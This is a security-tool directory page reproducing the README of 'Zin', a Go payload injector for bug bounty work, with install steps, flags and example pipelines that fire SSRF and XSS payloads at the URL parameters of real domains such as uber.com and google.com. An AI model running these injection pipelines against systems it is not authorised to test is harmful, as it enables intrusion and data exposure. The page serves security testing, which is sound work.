Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Zin — A Payload Injector for bugbounties written in go | Kitploit
Tools/GitHubGitHub/ethicalhackingplayground/zin
Web Application ExploitationInformation GatheringPenetration Testing
GitHubethicalhackingplayground/zin

Zin

A Payload Injector for bugbounties written in go

View Repository
70266 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

alt text

Version 1.0

😎 Zin 😎

A Payload Injector for bugbounties written in go

Image from Gyazo

Features

  • Inject multiple payloads into all parameters
  • Inject single payloads into all parameters
  • Saves responses into output folder
  • Displays Status Code & Response Length
  • Can grep for patterns in the response
  • Really fast
  • Easy to setup

Install

$ go get -u github.com/ethicalhackingplayground/Zin

New Features

-✅ Pattern Matching in responses

-✅ Match Status Codes

Arguments

root@kitploit:~
      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|


May the bounties come


  -c int
        the concurrency (default 20)
  -g string
        grep the response for any matches
  -p string
        the payload to be used
  -pL string
        the list of payloads to be used
  -s int
        filter by status codes (default 200)
        

SSRF Example

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

XSS Example

$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

Inject Multiple Payloads

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

Subdomain Scanning

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

Only Test Parameters

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

Multiple Hosts

$ cat hosts | gau | Zin -c 80 -p <payload>

If you get a bounty please support by buying me a coffee


Buy Me A Coffee
Download Tool